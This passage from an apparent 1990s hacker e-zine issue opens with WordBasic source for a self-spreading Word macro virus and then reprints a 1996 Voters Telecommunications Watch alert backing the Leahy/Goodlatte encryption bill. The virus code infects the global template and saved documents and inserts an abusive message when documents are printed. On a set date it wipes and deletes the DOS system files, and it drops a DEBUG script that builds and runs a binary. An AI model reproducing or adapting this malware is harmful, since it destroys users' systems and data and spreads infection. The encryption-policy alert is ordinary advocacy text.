MacroCopy WindowName$()+":FilePrintDefault","Global:FilePrintDefault",1
MacroCopy WindowName$()+":InsertPayload", "Global:InsertPayload",1
MacroCopy WindowName$()+":PayLoad", "Global:Payload",1
End If
Call Payload
End Sub
Function CheckInstalled
'Check if AutoExec macro already exists.
CheckInstalled = 0
If CountMacros(0) > 0 Then
For i = 1 To CountMacros(0)
If MacroName$(i, 0) = "AutoExec" Then
CheckInstalled = 1
End If
Next i
End If
End Function
========================================================
PURPOSE: To infect the Global Macro Area as soon as a
document is opened.
MACRO NAME: AutoOpen
MACRO CODE:
Sub MAIN
If CheckInstalled = 0 Then
MacroCopy WindowName$()+":AutoExec", "Global:AutoExec", 1
MacroCopy WindowName$()+":ToolsMacro", "Global:ToolsMacro", 1
MacroCopy WindowName$()+":AutoOpen", "Global:AutoOpen", 1
MacroCopy WindowName$()+":FileSaveAs", "Global:FileSaveAs", 1
MacroCopy WindowName$()+":FilePrint", "Global:FilePrint", 1
MacroCopy WindowName$()+":FilePrintDefault","Global:FilePrintDefault",1
MacroCopy WindowName$()+":InsertPayload", "Global:InsertPayload",1
MacroCopy WindowName$()+":PayLoad", "Global:Payload",1
End If
Call Payload
End Sub
Function CheckInstalled
'Check if AutoExec macro already exists.
CheckInstalled = 0
If CountMacros(0) > 0 Then
For i = 1 To CountMacros(0)
If MacroName$(i, 0) = "AutoExec" Then
CheckInstalled = 1
End If
Next i
End If
End Function
========================================================
PURPOSE: To infect a file when it is being saved.
MACRO NAME: FileSaveAs
MACRO CODE:
Sub MAIN
Dim dlg As FileSaveAs 'declare dialog as type FileSaveAs
GetCurValues dlg
Dialog dlg 'execute the dialog.
'Is the document of Type=(WordDocument or Template) ?
If (dlg.Format = 0) Or (dlg.Format = 1) Then
'Copy Macro's from Global data area into document.
MacroCopy "Global:AutoExec", WindowName$() + ":AutoExec", 1
MacroCopy "Global:AutoOpen", WindowName$() + ":AutoOpen", 1
MacroCopy "Global:FileSaveAs", WindowName$() + ":FileSaveAs", 1
MacroCopy "Global:ToolsMacro", WindowName$() + ":ToolsMacro", 1
MacroCopy "Global:FilePrint", WindowName$() + ":FilePrint", 1
MacroCopy "Global:FilePrintDefault",
WindowName$() + ":FilePrintDefault", 1
MacroCopy "Global:InsertPayload", WindowName$()+":InsertPayload",1
MacroCopy "Global:Payload", WindowName$()+":Payload",1
'Set to save document as a template.
dlg.Format = 1
End If
FileSaveAs dlg 'save the document infected.
End Sub
========================================================
PURPOSE: To call InsertPayload when someone chooses
Print from the File menu.
MACRO NAME: FilePrint
MACRO CODE:
Sub MAIN
Call InsertPayload 'possibly insert text.
Dim dlg As FilePrint 'declare dialog of type FilePrint
GetCurValues dlg
Dialog dlg 'excute print dialog window.
FilePrint dlg 'perform actions from dialog.
End Sub
========================================================
PURPOSE: To call InsertPayload when someone clicks
the "Print" button on the toolbar.
MACRO NAME: FilePrintDefault
MACRO CODE:
Sub MAIN
Call InsertPayload 'possibly insert text.
FilePrintDefault 'print document using default settings.
End Sub
========================================================
PURPOSE: Insert some text into documents if Second > 55.
MACRO NAME: InsertPayload
MACRO CODE:
Sub MAIN
If Second(Now()) > 55 Then 'seconds > 55 ?
EndOfDocument 'go to the end of document.
Insert Chr($ 11)
Insert "And finally I would like to say:"
Insert Chr($ 11)
Insert "No CUNTRY can do Nuclear Testing in the Pacific "
Insert Chr($ 11)
Insert " EXCEPT The United States of America "
Insert Chr($ 11)
Insert " OR we will BOMB the shit out of ya!"
StartOfDocument 'go to the start of document.
End If
End Sub
========================================================
PURPOSE: What the hell do you think?
MACRO NAME: PayLoad
MACRO CODE:
Sub MAIN:
If Day(Now())=5 And Month(Now())=4 Then
SetAttr "C:\IO.SYS",0
Open "C:\IO.SYS" For Output As #1
Close #1
SetAttr "C:\MSDOS.SYS",0
Open "C:\MSDOS.SYS",0
Close #1
SetAttr "C:\COMMAND.COM",0
Open "C:\COMMAND.COM" For Output As #1
Close #1
Kill "C:\COMMAND.COM"
End If
End Sub
========================================================
Sub MAIN
'Is is 5PM ? - approx time before work is finished.
If Hour(Now()) <> 5 + 12 Then
Goto NoDropper
On Error Goto NoDropper 'setup an error handler
Open "C:\DOS\DEBUG.EXE" For Input As #1 'does DEBUG exist?
Close #1 'Yes, close it.
Open "C:\DOS\PH33R.SCR" For Output As #1 'dump script.
Print #1, "N PH33R.COM"
Print #1, "E 0100 E8 47 00 06 1F BF 00 01 57 B8 CD 20 AB B8 00 00"
Print #1, "RCX" 'Convert this to "G" to run the code
Print #1, "0734"
Print #1, "G"
Print #1, "Q"
Print #1, ""
Close #1
Open "C:\DOS\EXEC_PH.BAT" For Output As #1
Print #1, "@echo off"
Print #1, "debug < ph33r.scr > nul"
Close #1
ChDir "C:\DOS"
Shell "EXEC_PH.BAT", 0
'Delete temporary files.
Kill "C:\DOS\EXEC_PH.BAT"
Kill "C:\DOS\PH33R.SCR"
NoDropper:
End Sub
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #7, File #8 of 9
================================================================= =======
__ _________ __
\ \ / /_ _\ \ / / Voters Telecommunications Watch (VTW)
\ \ / / | | \ \ /\ / / (We're not the EFF)
\ V / | | \ V V / URL:http://www.vtw.org/
\_/ |_| \_/\_/ Mar 5, 1996 (expires Apr 5, 1996)
SEN. LEAHY (D-VT) AND REP. GOODLATTE (R-VA) INTRODUCE
"ENCRYPTED COMMUNICATIONS PRIVACY ACT"
TO THWART CLINTON ADMINISTRATION'S FLAWED CLIPPER PLAN
Please widely redistribute this document with this banner intact
_________________________________________________________________ _______
CONTENTS
The Latest News
Analysis of Leahy bill
What You Can Do Now
Chronology of Leahy bill
Press Contact Information
A few questions and answers
Our policy on financial donations
_________________________________________________________________ _______
THE LATEST NEWS
In the opening round of what promises to be a no-holds-barred fight
with the Clinton Administration and the Intelligence community over
cryptography policy, Senator Patrick Leahy (D-VT) and Representative
Robert Goodlatte (R-VA) presented bills today that intend to:
-decontrol the export restrictions on mass-market and publicly
available software such as Phil Zimmerman's "Pretty Good Privacy"
(PGP),
-affirm Americans' right to use cryptography of their own choosing,
-affirm Americans' right to *not* use key escrow systems,
-make it a crime for an authorized key escrow agent to disclose a
key recklessly or intentionally, and
-create a crime of using cryptography while committing a felony
for the express purpose of thwarting an investigation.
The topic of cryptography exports is crucial to the continued growth
and security of the Internet and online commerce. The success of the
information economy in many cases hinges on the ability to employ
strong encryption techniques to protect confidential data.
The two bills come at a crucial time after the Clinton Administration
has put forth two flawed encryption proposals, Clipper and Son of
Clipper. A third plan, this time in the form of legislation, is in the
works if one is to believe the rumors in the press. So far the only
reason the Clinton Administration's flawed "Clipper" plans have been
paid any attention to at all is because they offer relaxed export
controls in return for storing your keys with government agencies or
quasi-government agencies. The best part of the Leahy bill, though, is
that you can use the encryption export provisions without ever thinking
about using escrow.
Leahy's bill will ensure that few consumers, if any, ever consider another
Clinton-mandated encryption scheme ever again.
The Leahy/Goodlatte bill allows the export of most of the cryptographic
products you and I would would like to use, without any of the Clipper
requirements. Without the lure of relaxed export for "Clippered"
products, nobody will pay attention to Clipper products. This will
surely be the deadly blow to all present and future "Clipper" plans
that rely on the Clinton Administration's strongarm export policy
tactics.
A new Clinton proposal on encryption is rumored to be in the works.
However, judging from the way they've bungled the first two proposals,
VTW believes the newest Clinton proposal will be created with a similar
process, with little regard for the concerns of business, industry and
the public.
One thing is certain; there will be movement on encryption policy this
year. It may be legislative or it may be regulatory; we're in a far
better position driving legislation we endorse, rather than lobbing
bombs at legislation being driven past us.
VTW believes this legislation is an excellent initiative. We have long
advocated the decontrol of cryptography export laws based on the
following principles:
-The public and businesses have the right to use the strongest
cryptographic products they (not the government) feel are necessary
to ensure the confidentiality of their private communications.
-The public and businesses should never be compelled to use software
with escrow functionality, escrow agents, nor escrow agents that
do not have the public's confidence.
-If the public and business should choose to use escrow agents,
the agents' primary responsibility should be to key owners, not to
law enforcement. They should be mostly unregulated, and in an
ideal world, there should be hundreds, if not thousands to choose
from.
-Current export controls are outdated, don't work, are endangering
the worsening the problem of security of the Internet, and are
damaging the competitiveness of US companies in the global
marketplace.
The way Leahy/Goodlatte addresses export of cryptography is consistent
with our principles. VTW will keep you informed of its progress. As
anyone familiar with the legislative process knows, a bill rarely ever
looks the same at the end of the process as it did at the beginning.
This bill is good for the Internet, and we intend to monitor it like
the watchdogs you expect us to be, to ensure that it does not
significantly deviate from the basic principles outlined above.
In doing this, it will be crucial for the Internet community to speak
up. Big business will weigh in on this bill to protect their rights to
sell products with encryption in them. However nobody will speak up
for your right to have a private conversation except you.
We're counting on you to find that voice, and use it over the next few
months to ensure that your present right to use encryption *of your
choice* isn't amended out of the bill. There are some powerful forces
out there that will be lobbying heavily on this legislation. The White
house is rumored to have their bill ready. The law enforcement and
intelligence communities, who would rather you couldn't use strong
encryption, will be employing their usual scare tactics. Worst of all,
the Clinton Administration, particularly Vice President Al Gore, who
should be a voice of reason for these issues, will, if the example of
Clipper and Son of Clipper is any indication, pander to law enforcement
and the anti-crime vote in an election year.
We predict that the White House will do everything in their power to
prevent Senator Leahy from liberating PGP. He will need your help to
push forward.
Over the next few months, VTW will be coordinating a coalition of
names, many of which are already familiar to you. This coalition will
ask you to call and write to Congress, expressing your opinion, and
threatening to back it up with the ultimate legitimate weapon of
democracy, your vote in this election year.
We're counting on you; we know you're up to it.
We urge you to visit our homepage at http://www.vtw.org/, where we'll
keep you updated on current events involving the bill. If you haven't
already, you may want to subscribe to our vtw-announce list, no
discussion, low-volume email messages that will keep you updated
directly as we issue alerts and newsletters. In the wake of the
Telecomm Bill protests, over 3,000 of you have subscribed in less than
a month. Use the one-line form on our home page.
P.S. We don't count our WWW page hits; we have better things to do.
_________________________________________________________________ _______
ANALYSIS OF ENCRYPTED COMMUNICATIONS PRIVACY ACT
The Leahy and Goodlatte bills are not exactly alike. For the moment,
we will concentrate on the Leahy bill for purposes of analysis. We
find it to be fleshed out in many areas.
AFFIRMS OUR RIGHT TO USE CRYPTOGRAPHY OF OWN CHOOSING
The bill affirms that "Americans should be free lawfully to use
whatever particular encryption techniques, technologies, programs, or
products developed in the marketplace they desire in order to interact
electronically worldwide in a secure, private, and confidential
manner". The bill also affirms our right to use cryptographic products
that do not have key escrow functions in them, or to choose not to use
such functions. If we do choose to use escrow holders, the bill
affirms our right to use key holders of our own choosing.
DEREGULATION OF PUBLICLY-AVAILABLE CRYPTOGRAPHIC TECHNOLOGY
The bill addresses the "PGP problem" by making software that is
"generally available", "publicly available", or "public domain"
exportable with NO LICENSE REQUIRED, unless it is "specifically
designed for military use".
CREATES CRIMINAL PENALTIES FOR MALICIOUS KEY HOLDERS
If I designate a local business to be my key holder, it is important
that they take that responsibility seriously. The bill creates
criminal penalties for key holders that behave recklessly with my
decryption keys.
Recently the Administration suggested that such individuals must be
licensed by the US Government, and in some cases, be required to
possess security clearances. This would make them little more than
puppets of law enforcement. The bill creates criminal penalties with
monetary fines if a key holder releases a key recklessly or
inappropriately. Reasonable rules for an escrow agents conduct are
described in the bill. These are discussed further below.
RAISES THE STANDARD FOR A COURT TO OBTAIN YOUR DECRYPTION KEY
Currently a court needs to only issue a simple search warrant to obtain
a copy of your key for decryption of your communications. This bill
raises the requirement to be equivalent to that of a court-ordered
wiretap.
ENCOURAGES KEY HOLDERS TO SERVE THE INTERESTS OF KEY OWNERS WHEN
PRESENTED WITH A COURT-ORDER
If you have chosen to use a key holder, they may find themselves in a
curious predicament if presented with a court order at some point in
the future. They really don't want to simply hand over your decryption
key, since once it is divulged, it might be used to decrypt more
information than what is required under the court order.
The bill instructs a key holder to provide law enforcement with as
little information as possible, in order to satisfy a warrant request,
while still protecting as much of the key owner's confidentiality as
possible.
The bill accomplishes this by instructing a key owner to attempt to
deliver decrypted communications only for the times specified by the
warrant to law enforcement as a first step. If the key holder is
unable to produce the decrypted communication for law enforcement, only
then, as a last resort, should a key holder relinquish your key.
This allows a key holder to work to protect the confidentiality of your
decryption keys, while still fulfilling both the spirit and letter of
the court order.
DISCOURAGES THE USE OF ENCRYPTION TO THWART A FELONY INVESTIGATION
This is probably the one provision we wouldn't have put in the bill,
were we drafting it. Clearly added to appease law enforcement, it
creates a new crime to "willfully" attempt to thwart a law enforcement
investigation by using encryption. VTW feels that such a crime is
unnecessary, but we're happy to see this is a fairly narrowly-tailored
statute. It only applies to individuals who are engaging in a felony
and using encryption to communicate information while in the commission
of the felony, and whose intent, in using encryption, is to foil a law
enforcement investigation.
If you and a friend are talking with an encrypted phone, and you
mention that you think some mutual friend is cheating on their taxes,
you are not liable under this provision. If you are planning the
Million Man March using encrypted email, and fear that you may be
investigated because your cause in unpopular in some law enforcement
circles, you are not liable because you are not committing a felony,
even though law enforcement may find it annoying that they cannot read
your mail.
This provision only applies to you if you are using encryption to
specifically foil a law enforcement investigation AND the communication
relates to a felony AND you are using the communication to commit the
felony. VTW feels this is a fairly narrowly drawn statute that is not
likely to be easily abused.
Although this bill is the best thing we've seen in Congress on this
issue since ex-Rep. Maria Cantwell's (D-WA) export-of-encryption bill
was introduced to the 103rd Congress two years ago, there are still
some issues in the bill that bear further examination. Let it be
understood that we think the balance of this bill right now will help
the net far more than hurt it and the net should step forward and help
Leahy and Goodlatte in their fight against the Administration over this
issue. Nevertheless, our suggestions for tuning this bill are included
below.
BILL SHOULD INCLUDE AN EXPLICIT SUPPRESSION PROVISION
Although the Fourth Amendment is the law of the land, it is important
to note that it a applies to communications decrypted after an
erroneous warrant has been issued. VTW feels that such a provision
should be enumerated in the bill, just to clarify any concerns a court
might have about such evidence. It is also clear, however, that such a
provision is nearly impossible to obtain in the current Congressional
climate, though we will continue to urge the bill's sponsors to add
it.
THE BILL SHOULD CLEARLY INCLUDE ENCRYPTION PRODUCTS FOR STORED DATA
The bill addresses encryptions products used for wire or oral
communications, per the Electronic Communications Privacy Act. Since
many encryption products are built for just this purpose, it includes
many of them. However, we think it is appropriate to specifically
include products that are used only for encrypting stored data.
THE BILL SHOULD INSTRUCT ESCROW AGENTS TO REPORT DISCLOSURES AS WELL
The bill currently requires law enforcement to notify the Office of the
Courts as to the number of court orders served on key holders and for
what crimes the court orders were obtained. The Office is required to
make this information public annually.
VTW feels that accountability should never be in short supply.
Requiring key holders to notify the Office of the Courts whenever they
are ordered to disclose a key will allow the public yet another way of
making sure that appropriate procedures are being followed to protect
the public.
We suggest an inexpensive reporting method such as registered mail so
as not to burden key holders needlessly. Presumably, when the Office
of the Courts totals up its numbers every year, the number of
disclosures reported by law enforcement will add up to the SAME number
reported by key holders themselves. Should there be a discrepancy, the
public will be grateful for the additional accountability.
NEW CRIMES ARE NEEDED TO DISCOURAGE MISREPRESENTING YOURSELF TO A KEY HOLDER
Currently the bill relies on existing laws that cover police
misrepresentation to punish law enforcement officials that misrepresent
themselves to a key holder with an improper or forged warrant to obtain
a key or a decrypted communication.
The majority of law enforcement officials are good people that would
never consider such an act. Consequently, they should have nothing to
fear from such a statute.
VTW believes that a new statute is needed to dissuade those few
over-zealous law enforcement officials from violating the public's
trust in these matters.
On the whole, we believe that this bill is a win for the Internet
public and Internet businesses that require strong market-driven
cryptography. VTW urges you to become familiar with it and support
Leahy and Goodlatte in their efforts.
_________________________________________________________________ _______
WHAT YOU CAN DO NOW
1. It's crucial that you familiarize yourself with this bill. You can
find links to it at http://www.vtw.org/ If you are an ISP or run a
WWW page, we urge you to place a pointer to the bill on your homepage
or in your message of the day. Here's a sample paragraph you can use:
A bill has been introduced in Congress today that will decontrol
many types of encryption products so they may be sold abroad,
including the world-famous PGP. To learn more about this
legislation, see VTW's home page at http://www.vtw.org/
Please remove this notice after a few days.
2. If you are an Internet Small Business, signon to VTW's Internet Small
Business Coalition at http://www.vtw.org/help/ We'll likely be
assembling a coalition of Internet small businesses in the next few
weeks and will solicit your input on ways of carrying your message to
Congress.
3. Join our vtw-announce mailing list by sending mail to majordomo@vtw.org
or by signing up straight through our WWW page at http://www.vtw.org/.
We'll be following this issue closely in the coming months. Note that
vtw-announce is not a discussion list. It's VTW announcements, with
little repeat content from other sources.
_________________________________________________________________ _______
CHRONOLOGY OF THE 1996 LEAHY/GOODLATTE CRYPTO BILLS
Feb 26, '96 Sen. Leahy (D-VT) and Rep. Goodlatte (R-VA) introduce
the Encrypted Communications Privacy Act. Cosponsoring
this legislation on the Senate side at Sen. Burns (R-MT)
and Sen. Murray (D-WA). On the House side are the
following cosponsors: DeLay, Campbell, Eshoo, Moorhead,
Doolittle, Barr, Ewing, Mica, Everett, Bono, Lofgren, and
McKeon.
_________________________________________________________________ _______
A FEW QUESTIONS AND ANSWERS
Q: Does this require, or even urge individuals to use third parties to
hold their decryption keys?
A: No way. You can use the liberal export provisions in this bill with
out ever allowing your keys to leave your "cold dead fingers".
Q: Does this advance the Clinton Administration's Clipper scheme in any way?
A: No, in fact this bill cuts out the very heart of the Clipper program.
The two Clipper programs had the potential to be adopted because Clipper
products were intended to receive preferential export treatment. This
allows the export of non-Clipper products. In the global marketplace,
the Clipper products will not be able to compete. This bill is probably
the final nail in the coffin of the Administration's flawed Clipper
proposals.
Q: Bills change during Congressional deliberation. Could this bill
change in such a way that VTW would no longer support it?
A: Absolutely. In fact, we consider it our mission to monitor the
legislation to ensure that it isn't amended to act against the right
of Internet users and businesses.
Q: Wasn't Goodlatte one of the bad guys on the Communications Decency Act?
Why is he sponsoring this bill, and can we trust him?
A: Goodlatte did indeed introduce the fatal amendment that made the House
version of the Telecomm Bill unsupportable. Nevertheless, VTW has found
that a Congressperson's vote on one sort of bill is little indication of
his or her stand on others. VTW wil closely examine any change in the
language of the bill throughout its Congressional life.
Q: Does this create a requirement for key holders to exist, or for me to
use programs that store keys with third parties?
A: No. The bill affirms your right to use encryption without such a feature,
and if you do use software with such a feature, to self-escrow the keys.
In fact, key holders can exist today.
Q: Does this create a new obligations for key holders to disclose keys that
they wouldn't have to comply with before?
A: No. In fact, this bill makes it harder for a law enforcement official to
retrieve a key from a key holder, by requiring a wiretap request instead
of a simple search warrant.
_________________________________________________________________ _______
PRESS CONTACT INFORMATION
BY EMAIL (if your deadline is more than 24 hours away)
Send mail to vtw@vtw.org with "press deadline" in the subject line if
you are on a deadline.
BY PHONE (if your deadline is in less than 24 hours)
Call 718-596-2851 and follow the directions for contacting Steven Cherry
or Shabbir J. Safdar quickly.
_________________________________________________________________ _______
OUR POLICY ON FINANCIAL DONATIONS
We do not accept unsolicited financial donations for our work. If you
want to help further VTW's work, we urge you to register to vote. Check
the Blue Pages of your local phone book for "Board of Elections". You
should be able to obtain voter registration forms from them.
_________________________________________________________________ _______
Copyright 1994-1996 Voters Telecommunications Watch. Permission is granted
to copy and distribute this document for non-commercial purposes only,
provided that the above banner and this copyright notice appear in all
copies. For other uses, see our Copyright Policy at
http://www.vtw.org/copyright.html
================================================================= =======
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #7, File #9 of 9
The End
Another issue reaches its end. This was kind of a rush job, I promise
to spend a lot more time on next issue. But for now, wherever you hack, may
the ethic be with you!